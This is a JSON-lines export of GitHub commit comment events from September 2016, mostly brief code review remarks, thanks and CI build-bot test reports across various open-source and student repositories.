{"id":"4619047448","type":"CommitCommentEvent","actor":{"login":"Shivprakash"},"repo":{"name":"Kshreyans/CodeArea-1-"},"payload":{"comment":{"id":19175601,"position":1,"line":1,"path":"swap_LL.c","commit_id":"760f4c618a1c6e9348aab7924d8109b379eb5d93","created_at":"2016-09-26T16:53:52Z","updated_at":"2016-09-26T16:53:52Z","body":"File Names must begin with caps. No special Chars in file names. Check file naming conventions on C/C++"}},"created_at":"2016-09-26T16:53:52Z"}
{"id":"4619048035","type":"CommitCommentEvent","actor":{"login":"EerieCode"},"repo":{"name":"EerieCode/EC3"},"payload":{"comment":{"id":19175603,"position":null,"line":null,"path":null,"commit_id":"ab76f8130db4cf660c63b882a66f63b4de4a304d","created_at":"2016-09-26T16:54:00Z","updated_at":"2016-09-26T16:54:00Z","body":"That... might actually work pretty well too. I was concerned about effects that would attach a \"Twelve Beast\" monster to an Xyz Monster (seriously, could the Wikia hurry up and decide a translation? This is going to end up another \"Ryuuseiryuu Meteo Dragon\", I swear...), but it seems I misread the effect. I'll try it once I'm back home: thanks, that really helped me!"}},"created_at":"2016-09-26T16:54:00Z"}
{"id":"4619048499","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19175608,"position":null,"line":null,"path":null,"commit_id":"da670c053fc6f96fed4cb3f76615ce212e000abf","created_at":"2016-09-26T16:54:04Z","updated_at":"2016-09-26T16:54:04Z","body":"``tools.deploy.shaker`` seems to use it (just ``set-global``) and also there were some ``command-line-tests.factor`` that depended on it too I think."}},"created_at":"2016-09-26T16:54:04Z"}
{"id":"4619049953","type":"CommitCommentEvent","actor":{"login":"cnmcavoy"},"repo":{"name":"chef-cookbooks/dmg"},"payload":{"comment":{"id":19175613,"position":4,"line":5,"path":"CHANGELOG.md","commit_id":"985b56da41ad71de1287043fa30b73dbd0590543","created_at":"2016-09-26T16:54:19Z","updated_at":"2016-09-26T16:54:19Z","body":"Thanks!"}},"created_at":"2016-09-26T16:54:19Z"}
{"id":"4619056362","type":"CommitCommentEvent","actor":{"login":"MagdalenaMileto"},"repo":{"name":"paturlannem/tpObjetosPdeP"},"payload":{"comment":{"id":19175624,"position":null,"line":null,"path":null,"commit_id":"6401931c90a6f0eb94b2bc55544c43881fc44518","created_at":"2016-09-26T16:55:25Z","updated_at":"2016-09-26T16:55:25Z","body":"¡La clase celos no va dentro del Sim! Debe ser un archivo .wlk aparte, como venían haciendo hasta ahora."}},"created_at":"2016-09-26T16:55:25Z"}
{"id":"4619058787","type":"CommitCommentEvent","actor":{"login":"matheusov"},"repo":{"name":"matheusov/trabalho2"},"payload":{"comment":{"id":19175630,"position":null,"line":null,"path":null,"commit_id":"d4b9fb95c4b3687e57db18e9e1638fffeb6c4925","created_at":"2016-09-26T16:55:50Z","updated_at":"2016-09-26T16:55:50Z","body":"Correção: mudança de tipo para teste 5"}},"created_at":"2016-09-26T16:55:50Z"}
{"id":"4619062679","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19175638,"position":null,"line":null,"path":null,"commit_id":"8dace97b8cbd86b2b14d62e958ad651b7e151c8b","created_at":"2016-09-26T16:56:32Z","updated_at":"2016-09-26T16:56:32Z","body":"temp (Unknown) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Tests Failed (0 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-26T16:56:32Z"}
{"id":"4619063967","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19175641,"position":null,"line":null,"path":null,"commit_id":"8dace97b8cbd86b2b14d62e958ad651b7e151c8b","created_at":"2016-09-26T16:56:47Z","updated_at":"2016-09-26T16:56:47Z","body":"temp (Unknown) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-26T16:56:47Z"}
{"id":"4619064005","type":"CommitCommentEvent","actor":{"login":"rwinch"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":19175642,"position":null,"line":null,"path":null,"commit_id":"e297706e8bfda38117a99fd06dace74c5a8cc5f1","created_at":"2016-09-26T16:56:47Z","updated_at":"2016-09-26T16:56:47Z","body":"@thomasdarimont That does read a lot better. Any interest in submitting a PR?"}},"created_at":"2016-09-26T16:56:47Z"}
{"id":"4619065700","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"MozillaItalia/morestuffformozita"},"payload":{"comment":{"id":19175646,"position":null,"line":null,"path":null,"commit_id":"4d0c889b74d15ad6cd7aaf11ddbb1940ede1dd6c","created_at":"2016-09-26T16:57:06Z","updated_at":"2016-09-26T16:57:06Z","body":"Duly noted ;)"}},"created_at":"2016-09-26T16:57:06Z"}
{"id":"4619071088","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"MozillaItalia/morestuffformozita"},"payload":{"comment":{"id":19175665,"position":null,"line":null,"path":null,"commit_id":"4d0c889b74d15ad6cd7aaf11ddbb1940ede1dd6c","created_at":"2016-09-26T16:58:02Z","updated_at":"2016-09-26T16:58:02Z","body":"Avete un esempio di tweet con 'sto osceno acronimo?"}},"created_at":"2016-09-26T16:58:02Z"}
{"id":"4619072528","type":"CommitCommentEvent","actor":{"login":"smelukov"},"repo":{"name":"postcss/autoprefixer"},"payload":{"comment":{"id":19175672,"position":6,"line":35,"path":"test/cases/grid.disabled.css","commit_id":"54c0db1aee0f686eae24635906b07100a2ba0f4e","created_at":"2016-09-26T16:58:17Z","updated_at":"2016-09-26T16:58:17Z","body":"-webkit-align-items: flex-end;"}},"created_at":"2016-09-26T16:58:17Z"}
{"id":"4619078700","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19175705,"position":null,"line":null,"path":null,"commit_id":"574978ef2ff43c74ef2ee0e78808a8e024188cdd","created_at":"2016-09-26T16:59:23Z","updated_at":"2016-09-26T16:59:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Tk48vTnORIKDOdiqvGBPuQ"}},"created_at":"2016-09-26T16:59:23Z"}
{"id":"4619083173","type":"CommitCommentEvent","actor":{"login":"RobertJohnston"},"repo":{"name":"RobertJohnston/SMART-Questionnaire"},"payload":{"comment":{"id":19175719,"position":null,"line":null,"path":null,"commit_id":"f5094fa3fafbf2822a866fd198e4bc35345e30b1","created_at":"2016-09-26T17:00:10Z","updated_at":"2016-09-26T17:00:10Z","body":"REMOVE THIS COMMIT - to go back to standard"}},"created_at":"2016-09-26T17:00:10Z"}
{"id":"4619083333","type":"CommitCommentEvent","actor":{"login":"gregsmirnov"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":19175720,"position":null,"line":null,"path":null,"commit_id":"74ecaded08131d314270ed25f5ce398b1018b344","created_at":"2016-09-26T17:00:12Z","updated_at":"2016-09-26T17:00:12Z","body":"@dhensby This commit creates folder conflict on case-insensitive file-system (Mac, Windows):\r\n\r\n`framework/Control` and `framework/control`\r\n\r\nwhile `framework/tests/control` is always lowercase."}},"created_at":"2016-09-26T17:00:12Z"}
{"id":"4619086042","type":"CommitCommentEvent","actor":{"login":"glorygeek"},"repo":{"name":"meleu/RetroPie-joystick-selection"},"payload":{"comment":{"id":19175725,"position":null,"line":null,"path":null,"commit_id":"822cd14885b73a84161b5e8c53053b7761aa3000","created_at":"2016-09-26T17:00:37Z","updated_at":"2016-09-26T17:00:37Z","body":"**Thanks**"}},"created_at":"2016-09-26T17:00:37Z"}
{"id":"4619086649","type":"CommitCommentEvent","actor":{"login":"smelukov"},"repo":{"name":"postcss/autoprefixer"},"payload":{"comment":{"id":19175726,"position":7,"line":51,"path":"test/cases/grid.out.css","commit_id":"54c0db1aee0f686eae24635906b07100a2ba0f4e","created_at":"2016-09-26T17:00:43Z","updated_at":"2016-09-26T17:00:43Z","body":"Add -ms-grid-row-align: end;\r\nCause we don't know a contex of the align-items"}},"created_at":"2016-09-26T17:00:43Z"}
{"id":"4619087239","type":"CommitCommentEvent","actor":{"login":"t0b3"},"repo":{"name":"aqbanking/aqbanking"},"payload":{"comment":{"id":19175728,"position":null,"line":null,"path":null,"commit_id":"0e60f7a82012753e99bd99bb1060ddf3f5612860","created_at":"2016-09-26T17:00:49Z","updated_at":"2016-09-26T17:00:49Z","body":"Great, thank you!"}},"created_at":"2016-09-26T17:00:49Z"}
{"id":"4619094031","type":"CommitCommentEvent","actor":{"login":"owenmik"},"repo":{"name":"owenmik/hello-world"},"payload":{"comment":{"id":19175748,"position":null,"line":null,"path":null,"commit_id":"93e7dd8e62df5b68c88e441588da77236511eae0","created_at":"2016-09-26T17:02:02Z","updated_at":"2016-09-26T17:02:02Z","body":"learning about technology yay\r\n"}},"created_at":"2016-09-26T17:02:02Z"}
{"id":"4619095455","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19175757,"position":null,"line":null,"path":null,"commit_id":"8dace97b8cbd86b2b14d62e958ad651b7e151c8b","created_at":"2016-09-26T17:02:18Z","updated_at":"2016-09-26T17:02:18Z","body":"temp (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-26T17:02:18Z"}
{"id":"4619097488","type":"CommitCommentEvent","actor":{"login":"owenmik"},"repo":{"name":"owenmik/hello-world"},"payload":{"comment":{"id":19175763,"position":null,"line":null,"path":null,"commit_id":"93e7dd8e62df5b68c88e441588da77236511eae0","created_at":"2016-09-26T17:02:42Z","updated_at":"2016-09-26T17:02:42Z","body":"is this another edit"}},"created_at":"2016-09-26T17:02:42Z"}
{"id":"4619098072","type":"CommitCommentEvent","actor":{"login":"RobertJohnston"},"repo":{"name":"RobertJohnston/SMART-Questionnaire"},"payload":{"comment":{"id":19175765,"position":null,"line":null,"path":null,"commit_id":"8b2a95aa8290b3123be3e31c26c3f73a43300af1","created_at":"2016-09-26T17:02:49Z","updated_at":"2016-09-26T17:02:49Z","body":"This is UNADULTERATED GENERIC VERSION"}},"created_at":"2016-09-26T17:02:49Z"}
{"id":"4619099194","type":"CommitCommentEvent","actor":{"login":"Geekavenger"},"repo":{"name":"Geekavenger/RIIDesign"},"payload":{"comment":{"id":19175769,"position":null,"line":null,"path":null,"commit_id":"212251ef3696f56487edc38da5b263c6764c7f6f","created_at":"2016-09-26T17:03:01Z","updated_at":"2016-09-26T17:03:01Z","body":"Commit"}},"created_at":"2016-09-26T17:03:01Z"}
{"id":"4619100329","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":19175774,"position":null,"line":null,"path":null,"commit_id":"74ecaded08131d314270ed25f5ce398b1018b344","created_at":"2016-09-26T17:03:14Z","updated_at":"2016-09-26T17:03:14Z","body":"@gregsmirnov in `3` the folder is lowercase `control` (as in this commit) and in `master` the folder is capitalised `Control` and this appears to all be in order when I check the git repo..."}},"created_at":"2016-09-26T17:03:14Z"}
{"id":"4619101728","type":"CommitCommentEvent","actor":{"login":"patriksam182"},"repo":{"name":"patriksam182/chat_qa"},"payload":{"comment":{"id":19175782,"position":null,"line":null,"path":null,"commit_id":"bd9a1b00d6badbd1b37fabcf58d631e2e0ae7692","created_at":"2016-09-26T17:03:29Z","updated_at":"2016-09-26T17:03:29Z","body":"Fi"}},"created_at":"2016-09-26T17:03:29Z"}
{"id":"4619102220","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"postcss/autoprefixer"},"payload":{"comment":{"id":19175783,"position":7,"line":51,"path":"test/cases/grid.out.css","commit_id":"54c0db1aee0f686eae24635906b07100a2ba0f4e","created_at":"2016-09-26T17:03:34Z","updated_at":"2016-09-26T17:03:34Z","body":"As I understand `flex-end` could be used only for flexbox. For flex *and* grid you need to write `end`, isn’t it?"}},"created_at":"2016-09-26T17:03:34Z"}
{"id":"4619105447","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"postcss/autoprefixer"},"payload":{"comment":{"id":19175802,"position":6,"line":35,"path":"test/cases/grid.disabled.css","commit_id":"54c0db1aee0f686eae24635906b07100a2ba0f4e","created_at":"2016-09-26T17:04:10Z","updated_at":"2016-09-26T17:04:10Z","body":"Good catch, but this test executes only for `IE`, so not `webkit` in this file."}},"created_at":"2016-09-26T17:04:10Z"}
{"id":"4619108043","type":"CommitCommentEvent","actor":{"login":"apolo96"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19175810,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T17:04:39Z","updated_at":"2016-09-26T17:04:39Z","body":"good working , my product disigner/manager"}},"created_at":"2016-09-26T17:04:39Z"}
{"id":"4619113585","type":"CommitCommentEvent","actor":{"login":"Naatan"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19175830,"position":null,"line":null,"path":null,"commit_id":"d67cc172bf352719c36707007fe096d425742fa7","created_at":"2016-09-26T17:05:44Z","updated_at":"2016-09-26T17:05:44Z","body":"Alright, thanks @twhiteman :) \r\n\r\n@mitchell-as let's take this as an opportunity to optimize onUpdateUI. Computers have gotten much faster over the years, so it's plausible that the delay isn't necessary anymore. Though I can see repeat calls within a very small timeframe being bad for performance. I'd be curious to see exactly what it's doing and whether all of it should generically live under \"updateUI\" or be made a bit more intelligent / context aware. I'll follow up on this myself."}},"created_at":"2016-09-26T17:05:44Z"}
{"id":"4619113758","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":19175831,"position":null,"line":null,"path":null,"commit_id":"74ecaded08131d314270ed25f5ce398b1018b344","created_at":"2016-09-26T17:05:46Z","updated_at":"2016-09-26T17:05:46Z","body":"@gregsmirnov thanks for pointing that out quickly, I've now pushed a fix up"}},"created_at":"2016-09-26T17:05:46Z"}
{"id":"4619117584","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19175844,"position":null,"line":null,"path":null,"commit_id":"8dace97b8cbd86b2b14d62e958ad651b7e151c8b","created_at":"2016-09-26T17:06:28Z","updated_at":"2016-09-26T17:06:28Z","body":"temp (Unknown) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dace97b8cbd86b2b14d62e958ad651b7e151c8b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-26T17:06:28Z"}
{"id":"4619129082","type":"CommitCommentEvent","actor":{"login":"rainers"},"repo":{"name":"ldc-developers/dmd-testsuite"},"payload":{"comment":{"id":19175876,"position":15,"line":142,"path":"Makefile","commit_id":"015c9ac4c90757c68091ca357c61d0627ae8463e","created_at":"2016-09-26T17:08:33Z","updated_at":"2016-09-26T17:08:33Z","body":"It is supposed to run on circle-ci, but I usually get the logic of $(findstring) wrong in the first attempt. And often in the second attempt, too..."}},"created_at":"2016-09-26T17:08:33Z"}
{"id":"4619129087","type":"CommitCommentEvent","actor":{"login":"Nsnskajwjsj"},"repo":{"name":"Nsnskajwjsj/SoftUni-Repo"},"payload":{"comment":{"id":19175877,"position":null,"line":null,"path":null,"commit_id":"929029c1abe71e6fa0963889196ff295903978c8","created_at":"2016-09-26T17:08:33Z","updated_at":"2016-09-26T17:08:33Z","body":"SoftUni"}},"created_at":"2016-09-26T17:08:33Z"}
{"id":"4619136486","type":"CommitCommentEvent","actor":{"login":"jefferai"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19175908,"position":null,"line":null,"path":null,"commit_id":"207d16bf8bfa15af807176af696c2cb61c769fb3","created_at":"2016-09-26T17:09:57Z","updated_at":"2016-09-26T17:09:57Z","body":"I've made an update; it'll deploy to the web site in a bit."}},"created_at":"2016-09-26T17:09:57Z"}
{"id":"4619139385","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19175921,"position":null,"line":null,"path":null,"commit_id":"86b6b6544db5bc64c1d39a4478e7d27e057182e1","created_at":"2016-09-26T17:10:29Z","updated_at":"2016-09-26T17:10:29Z","body":"> Er moet sowieso nog meer rekening gehouden worden met eventuele uitzonderingen op de data.\r\n\r\nHeb je een overzicht van de mogelijke uitzonderingen om te controleren?"}},"created_at":"2016-09-26T17:10:29Z"}
{"id":"4619147074","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19175949,"position":null,"line":null,"path":null,"commit_id":"6f673a4c5367e2df10a71b41de3af1b3984d40e7","created_at":"2016-09-26T17:11:48Z","updated_at":"2016-09-26T17:11:48Z","body":"> voor visited had ik het idee om Eetplan records aan te maken met datum 00-00-0000\r\n\r\nDit klinkt als een hack. Nu je een orm model hebt is er misschien een mooiere oplossing te verzinnen?"}},"created_at":"2016-09-26T17:11:48Z"}
{"id":"4619147454","type":"CommitCommentEvent","actor":{"login":"failfarm"},"repo":{"name":"jMonkeyEngine/wiki"},"payload":{"comment":{"id":19175950,"position":null,"line":null,"path":null,"commit_id":"6f57d3bde72da012fde5882211a1b957732cfcf2","created_at":"2016-09-26T17:11:52Z","updated_at":"2016-09-26T17:11:52Z","body":"updated all the dead links "}},"created_at":"2016-09-26T17:11:52Z"}
{"id":"4619154864","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19175966,"position":1,"line":1,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:13:14Z","updated_at":"2016-09-26T17:13:14Z","body":"It would be great to include database requirements in the README (or a reference to actual configuration). Just booting up the app is NOT enough since MySQL must be running and the database must exist, per current implementation."}},"created_at":"2016-09-26T17:13:14Z"}
{"id":"4619155992","type":"CommitCommentEvent","actor":{"login":"RobinPetit"},"repo":{"name":"RobinPetit/BermudOS"},"payload":{"comment":{"id":19175967,"position":19,"line":104,"path":"boot/kernel.c","commit_id":"697041b1200fb5a0a8ae82eb2c5d34be0c64c112","created_at":"2016-09-26T17:13:26Z","updated_at":"2016-09-26T17:13:26Z","body":"Ain't that right? Just wait a bit and everything goes on as we would like to! (The real fix is in interval_timer.c, line 25...)"}},"created_at":"2016-09-26T17:13:26Z"}
{"id":"4619164362","type":"CommitCommentEvent","actor":{"login":"avalchev"},"repo":{"name":"syslandscape/syslandscape"},"payload":{"comment":{"id":19175988,"position":null,"line":null,"path":null,"commit_id":"e54ddcd3a70831bbba7c6fd86273947c6955845f","created_at":"2016-09-26T17:14:59Z","updated_at":"2016-09-26T17:14:59Z","body":"#4 "}},"created_at":"2016-09-26T17:14:59Z"}
{"id":"4619164978","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19175990,"position":8,"line":8,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:15:07Z","updated_at":"2016-09-26T17:15:07Z","body":"Markdown allows formatting code or payload samples in a neat way by using blocks: https://help.github.com/articles/creating-and-highlighting-code-blocks/"}},"created_at":"2016-09-26T17:15:07Z"}
{"id":"4619173885","type":"CommitCommentEvent","actor":{"login":"Keweiqu"},"repo":{"name":"Keweiqu/graphics"},"payload":{"comment":{"id":19176013,"position":5,"line":14,"path":"hws/hw3/main.c","commit_id":"8c87d3c6f3d01742cf86be5a14e60bffc2f2b011","created_at":"2016-09-26T17:16:45Z","updated_at":"2016-09-26T17:16:45Z","body":"why change side length to 1? we need to cover the entire x-y plane... it should be 2."}},"created_at":"2016-09-26T17:16:45Z"}
{"id":"4619175847","type":"CommitCommentEvent","actor":{"login":"kykdev"},"repo":{"name":"HydraCompany/HydraRom"},"payload":{"comment":{"id":19176016,"position":null,"line":null,"path":null,"commit_id":"922d5ebcc4cf409f8676cba95e297b4ad43aeeb1","created_at":"2016-09-26T17:17:08Z","updated_at":"2016-09-26T17:17:08Z","body":"Can you give me some help on deodexing? I did the same way as I did it for S7 firmwares but no luck on N7 ones :( oat2dex failes to deodex properly and superr's oatdump method gives me tons of FCs."}},"created_at":"2016-09-26T17:17:08Z"}
{"id":"4619176755","type":"CommitCommentEvent","actor":{"login":"yakiradixon"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19176019,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-26T17:17:18Z","updated_at":"2016-09-26T17:17:18Z","body":"> The spec says it's optional, and otrv3 sends similar information in an\r\nunencrypted header.\r\n\r\nThe double ratchet spec or the OTRv3 spec? \r\n\r\nThe double ratchet spec notes an algorithm variation where the header can be unencrypted if:\r\n - a new ratchet key (instead of a new header key) is used to signal that the DH ratchet is advancing\r\n - header keys are not being used to detect delayed messages \r\n\r\nClarifying whether we want to use header keys for what we are trying to achieve will inform our decision about encrypting the header.\r\n"}},"created_at":"2016-09-26T17:17:18Z"}
{"id":"4619177452","type":"CommitCommentEvent","actor":{"login":"bhousel"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19176023,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-26T17:17:26Z","updated_at":"2016-09-26T17:17:26Z","body":"> The scope of the OWG explicitly excludes authoring software. Is this a good contact for the proposed code of conduct, and have you checked with them?\r\n\r\nI haven't checked with them, just added it because it seemed like a good email to reach all the right people. "}},"created_at":"2016-09-26T17:17:26Z"}
{"id":"4619182079","type":"CommitCommentEvent","actor":{"login":"ballweera"},"repo":{"name":"beeer213/tennis-"},"payload":{"comment":{"id":19176040,"position":null,"line":null,"path":null,"commit_id":"3aaa88927125d34dd175e2fba45ba43cc4b3b387","created_at":"2016-09-26T17:18:17Z","updated_at":"2016-09-26T17:18:17Z","body":"test case สำหรับโปรแกรมส่วนนี้อยู่ไหนครับ ผมยังไม่เห็นมี test กำกับ logic ส่วนนี้เลยนะครับ"}},"created_at":"2016-09-26T17:18:17Z"}
{"id":"4619188751","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176070,"position":10,"line":10,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:19:31Z","updated_at":"2016-09-26T17:19:31Z","body":"Just copy pasting this snippet into the REST client won't help, because it is not a valid JSON. Having explanations near mandatory fields and expected time format is nice, but it should get into the way of well-formed JSON syntax."}},"created_at":"2016-09-26T17:19:31Z"}
{"id":"4619189059","type":"CommitCommentEvent","actor":{"login":"jehymes"},"repo":{"name":"jehymes/SisCoor"},"payload":{"comment":{"id":19176072,"position":4,"line":39,"path":"src/modelo/Servidor.java","commit_id":"2c411f30127f4b78409c9736de12b07bb64692db","created_at":"2016-09-26T17:19:35Z","updated_at":"2016-09-26T17:19:35Z","body":"Você tinha removido e acrescentou novamente..."}},"created_at":"2016-09-26T17:19:35Z"}
{"id":"4619193488","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"MozillaItalia/morestuffformozita"},"payload":{"comment":{"id":19176083,"position":null,"line":null,"path":null,"commit_id":"4d0c889b74d15ad6cd7aaf11ddbb1940ede1dd6c","created_at":"2016-09-26T17:20:21Z","updated_at":"2016-09-26T17:20:21Z","body":"No, almeno se intendi tweet che abbiamo da tradurre. Al momento è usata \nnegli snippet e  un po' di spazio, almeno in questo caso, sembra esserci.\nhttps://pontoon.mozilla.org/it/mozilla-advocacy/all-resources/?search=icymi&string=158655\n\nSe invece intendi tweet che ho visto, da Mozilla mi sembra  di averne \nvisto qualcuno in passato, però non ricordo di preciso di che parlasse.\n\n\n\n"}},"created_at":"2016-09-26T17:20:21Z"}
{"id":"4619199567","type":"CommitCommentEvent","actor":{"login":"egov-systems"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19176095,"position":83,"line":125,"path":"egov/egov-works/src/main/java/org/egov/works/abstractestimate/service/EstimatePhotographService.java","commit_id":"b9520aa7849e24f71d4de099e23ba65e23102a4f","created_at":"2016-09-26T17:21:29Z","updated_at":"2016-09-26T17:21:29Z","body":"i guess image compression is already there in ImageUtil from Infra, if the API require any upgrade, consider discuss and enhance it there rather than creating personal version of same functionality."}},"created_at":"2016-09-26T17:21:29Z"}
{"id":"4619199796","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_6"},"payload":{"comment":{"id":19176097,"position":19,"line":19,"path":"js/dropdown.js","commit_id":"1e7a2657ea0e4e2d7927febfa74c174266e1781d","created_at":"2016-09-26T17:21:32Z","updated_at":"2016-09-26T17:21:32Z","body":"Your if/else block is written perfectly; however, you aren't quite running it in the correct place. You want the comparison to happen when the user changes the input, so perhaps try moving this block within your filter function."}},"created_at":"2016-09-26T17:21:32Z"}
{"id":"4619201989","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_6"},"payload":{"comment":{"id":19176102,"position":8,"line":8,"path":"js/dropdown.js","commit_id":"1e7a2657ea0e4e2d7927febfa74c174266e1781d","created_at":"2016-09-26T17:21:56Z","updated_at":"2016-09-26T17:21:56Z","body":"Well done using a `forEach` loop!"}},"created_at":"2016-09-26T17:21:56Z"}
{"id":"4619202621","type":"CommitCommentEvent","actor":{"login":"IonomyGuy"},"repo":{"name":"sherlockcoin/ion"},"payload":{"comment":{"id":19176105,"position":46,"line":1161,"path":"src/main.cpp","commit_id":"437e87c50fde5cdc9c9157c246bbc3a608707fdc","created_at":"2016-09-26T17:22:02Z","updated_at":"2016-09-26T17:22:02Z","body":"0.2 is what was left to bleed out at the end of the life run if i am correct i could be wrong."}},"created_at":"2016-09-26T17:22:02Z"}
{"id":"4619204020","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176109,"position":25,"line":25,"path":"README.md","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:22:19Z","updated_at":"2016-09-26T17:22:19Z","body":"While there is no such thing as _valid_ URL structures and REST does not care about the naming, I'd suggest to avoid action names in path segments and use standard methods for removing a resource by applying a simple DELETE method."}},"created_at":"2016-09-26T17:22:19Z"}
{"id":"4619208452","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19176120,"position":null,"line":null,"path":null,"commit_id":"b29604235bbc78a243fbabcdf30d073a64bf1262","created_at":"2016-09-26T17:23:05Z","updated_at":"2016-09-26T17:23:05Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-26T17:23:05Z"}
